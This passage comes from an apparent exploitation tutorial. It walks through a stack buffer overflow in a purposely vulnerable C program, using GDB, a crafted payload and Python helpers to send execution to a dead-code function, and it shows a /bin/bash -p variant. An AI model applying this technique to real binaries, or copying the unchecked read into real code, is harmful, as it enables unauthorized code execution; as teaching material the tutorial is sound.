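  system("touch hacked.txt");
  return 0;
}

// The buffer holds 200 bytes, but read() happily accepts up to 400.
int overflow(){
  char buffer[200];
  int input;
  input = read(0, buffer, 400);
  printf("\n[+] user supplied: %d-bytes!", input);
  printf("\n[+] buffer content --> %s!", buffer);
  return 0;
}

int main(int argc, char * argv[]){
  overflow();
  return 0;
}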
```

{% endcode %}

The only difference between this program and the previous one is the inclusion of the **`hackme()`** function, which will create a file called **`hacked.txt`**. Now, it won’t ever get the chance to actually run, since nothing inside of **`main()`** ever calls it, so this is just dead code inside of the program. Let’s compile this:

{% code overflow="wrap" %}

```bash
bin_0x01 ›› gcc -m32 -no-pie -fno-pie -mno-accumulate-outgoing-args -fno-stack-protector -z execstack vulnerable_II.c -o vulnerable_II
```

{% endcode %}

<figure><img src="/files/UdAqr1uNAZ9RG8fe2HcJ" alt=""><figcaption><p>Compilation of vulnerable_II.c</p></figcaption></figure>

Nice. If we open this new binary inside of a debugger and list the functions now, we should see the function that we’ve included:

<figure><img src="/files/padvTlSb39R5eFcIVr1S" alt=""><figcaption><p>Listing functions of the binary, our vulnerable function is listed there</p></figcaption></figure>

Et voilà! It’s here. Now, remember, this function is NEVER called during runtime. You’re not going to find it inside of `main`. The only thing you’ll find is the call to the **`overflow()`** function:

```c
gdb-peda$ disas main
Dump of assembler code for function main:
   0x080491e5 <+0>:	push   ebp
   0x080491e6 <+1>:	mov    ebp,esp
   0x080491e8 <+3>:	and    esp,0xfffffff0
   0x080491eb <+6>:	call   0x804918f <overflow>
   0x080491f0 <+11>:	mov    eax,0x0
   0x080491f5 <+16>:	leave
   0x080491f6 <+17>:	ret
End of assembler dump.
gdb-peda$
```

{% hint style="info" %}
This is where it gets super interesting! Pay attention!
{% endhint %}

So, we can crash the program, and we can crash it precisely enough to supply the instruction pointer with a bunch of B’s. But what else can we do and, more importantly, how much more malicious can we get? Well, friends, allow me to introduce the concept of **`EIP`** control, or execution control. So, the **`EIP`** register, what does it do? Basically, the instruction pointer can be summarized as follows:

> The Program Counter, also known as the Instruction pointer, is a processor register that indicates the current address of the program being executed. \
> — [Program Counter, Embedded Artistry](https://embeddedartistry.com/fieldmanual-terms/program-counter/)
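To make that concrete, here is a toy model (not the real binary) of how bytes written past a buffer end up in the instruction pointer. The 16-byte buffer, the saved `EBP` value, and the helper names are all assumptions made up for illustration; the real frame in our program is larger, but the mechanism is the same: `ret` loads whatever sits in the saved return address slot.

```python
import struct

BUF_SIZE = 16              # hypothetical tiny buffer, for illustration only
RET_SLOT = BUF_SIZE + 4    # buffer, then 4 bytes of saved EBP, then the return address


def make_frame(ret_addr):
    """Lay out a simplified frame: buffer | saved EBP | saved return address."""
    saved_ebp = struct.pack("<I", 0xFFFFD000)  # made-up value
    return bytearray(b"\x00" * BUF_SIZE + saved_ebp + struct.pack("<I", ret_addr))


def unchecked_copy(frame, data):
    """Copy input from the start of the buffer without checking BUF_SIZE."""
    data = data[:len(frame)]      # keep the toy frame a fixed size
    frame[0:len(data)] = data


def ret(frame):
    """Emulate `ret`: load the saved return address into EIP."""
    return struct.unpack_from("<I", frame, RET_SLOT)[0]


frame = make_frame(0x080491F0)    # the address right after `call overflow` in main
unchecked_copy(frame, b"A" * RET_SLOT + b"BBBB")
eip = ret(frame)
print(hex(eip))  # 0x42424242
```

The four B’s land exactly in the return address slot, so that is what `EIP` receives when the function returns.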

So, if you recall, when we filled the **`EIP`** register with the four B’s, those were just junk bytes. **`0x42424242`** doesn’t point to any usable memory in this process, which is why the program crashed. However, *<mark style="background-color:orange;">what if instead of supplying B’s or any other letter, we supplied the address of a function - specifically, the function that wouldn’t otherwise get executed 😉</mark>*. Therein lies the beauty of this technique. We get to use our program *against itself*. First, let’s go ahead and disassemble the function we added:

<figure><img src="/files/ySLYeGvGAJRd8WoAQk7j" alt=""><figcaption><p>Disassembly of hackme()</p></figcaption></figure>

In this output, we can clearly see that inside the **`hackme()`** function, there’s a call to **`system()`** with a **`push`** of an address right above it. The address being pushed is the argument passed to **`system()`**: a pointer to the command string. In this case, the command should create a text file called **`hacked.txt`**. Let’s confirm that by examining that address as a string:

```c
gdb-peda$ x/s 0x804a008
0x804a008:	"touch hacked.txt"
```

It’s just as we thought! Perfect. Now, let’s move on and actually exploit this program: we overflow the buffer and overwrite the saved return address with the address of the **`hackme()`** function, so that when **`overflow()`** returns, **`EIP`** is loaded with it - the culmination of which will create a text file in our directory. So, let’s start off by getting the address of this function:

```c
gdb-peda$ p hackme
$1 = {<text variable, no debug info>} 0x8049176 <hackme>
```

Remember that x86 is little-endian: multi-byte values are stored in memory least-significant byte first. This means that we can’t just supply the address above as is. We pad it to four bytes (**`0x08049176`**) and reverse the byte order, so the bytes we actually send are:

```c
"\x76\x91\x04\x08"
```
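If you’d rather not reverse bytes by hand, Python’s standard `struct` module can do the packing. This is just a small sketch; `HACKME_ADDR` is my own name for the address GDB printed above.

```python
import struct

HACKME_ADDR = 0x08049176  # address of hackme() as reported by GDB

# "<I" means: little-endian, unsigned 32-bit integer
packed = struct.pack("<I", HACKME_ADDR)

print(packed.hex())  # 76910408
```

The hex dump shows the same four bytes as above, in the order they will sit in memory.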

See how much more useful this is compared to our “BBBB” inside of the **`EIP`** register? Now, when **`EIP`** gets this value, it’ll run the **`hackme()`** function instead of crashing because there’s nothing to execute at **`0x42424242`**. Let’s replace our payload:

```bash
bin_0x01 ›› python -c 'print("A" * 216 + "B" * 4 + "C" * 180)' > offset.txt
```

This turns into:

{% code overflow="wrap" %}

```bash
bin_0x01 ›› python2 -c 'print("A" * 216 + "\x76\x91\x04\x08" + "C" * 180)' > exploit.txt
```

{% endcode %}

{% hint style="info" %}
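The reason I used **`python2`** for this command is that Python 3’s **`print`** treats the payload as text and encodes it on output (typically as UTF-8), so a byte above **`0x7f`** such as **`\x91`** gets written as two bytes and corrupts the address. See [this](https://stackoverflow.com/questions/43477337/how-to-fix-gdb-probable-charset-issue-nop-0x90-translating-to-0x90c2-in-memory) for details.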
{% endhint %}
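If you only have Python 3 around, one way to get the same file is to build the payload as `bytes` and write it in binary mode. The sketch below assumes the same numbers as the one-liner above (216 bytes of padding, the `hackme()` address, 180 trailing C’s); `build_payload` and `write_payload` are names I made up for illustration.

```python
import struct

OFFSET = 216               # bytes of padding before the saved return address
HACKME_ADDR = 0x08049176   # address of hackme() from GDB
TRAILER = 180              # trailing C's, same as the one-liner


def build_payload(offset=OFFSET, addr=HACKME_ADDR, trailer=TRAILER):
    """Return the exploit input as raw bytes, with no text encoding involved."""
    return b"A" * offset + struct.pack("<I", addr) + b"C" * trailer


def write_payload(path="exploit.txt"):
    """Write the payload in binary mode so no byte gets re-encoded."""
    with open(path, "wb") as f:
        f.write(build_payload() + b"\n")  # print() in the one-liner also appends a newline


payload = build_payload()

# What goes wrong with a text string under UTF-8: \x91 becomes two bytes.
mangled = "\x76\x91\x04\x08".encode("utf-8")
print(mangled)  # b'v\xc2\x91\x04\x08'
```

Calling `write_payload()` produces an `exploit.txt` that can be fed to the program with `r < exploit.txt` in GDB, just like the `python2` version.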

Now, if we finally run this exploit input, we should see that the exploit forces the binary to run that **`hackme()`** function and thus, a file will be created. First, let’s list our current directory:

<figure><img src="/files/5gGHRyaZ9ykyfVAKKb7c" alt=""><figcaption><p>Listing current directory</p></figcaption></figure>

See, there’s no **`hacked.txt`** file. Now, let’s open the program up inside of GDB and run the exploit:

```bash
gdb-peda$ r < exploit.txt
```

<figure><img src="/files/6C4ghFEMAXfTr7BSahgM" alt=""><figcaption><p>Running our exploit</p></figcaption></figure>

Awesome, we can see that new processes were spawned, which should’ve created our file:

<figure><img src="/files/1KJ0R5THkOVXpcyGk7Fq" alt=""><figcaption><p>File gets created</p></figcaption></figure>

And there we have it! The file was created! Now, obviously, creating a file is not that special but could you imagine the devastation if instead of:

```c
int hackme(){
    system("touch hacked.txt");
}
```

There was a function like:

```c
int uh_oh(){
    system("/bin/bash -p");
}
```

Yeah… That wouldn’t be good. If we were to redirect the **`EIP`** to that **`uh_oh()`** function as is, the shell wouldn’t be stable enough for us to use: it would hit end-of-file on the redirected `STDIN` and exit right away. There’s a nice little trick we can use to keep the shell open (called the double-cat trick), but that’s a talk for a different time. I hope you’ll excuse me for blabbering on and nerding out, but you can see how cool this is. From the basic reverse engineering to delving deep and hacking this program, I hope you learned something from this, and I sincerely thank you for reading this post!

{% hint style="success" %}
Until next time! 😄
{% endhint %}

## Capstone Challenge

[^1]: We're just about to cover function prologues and epilogues in a bit. Don't worry if you don't understand what this means yet. Keep on reading and then come back to this if you'd like. It should make more sense then!

[^2]: This is also known as a "black-box" approach.


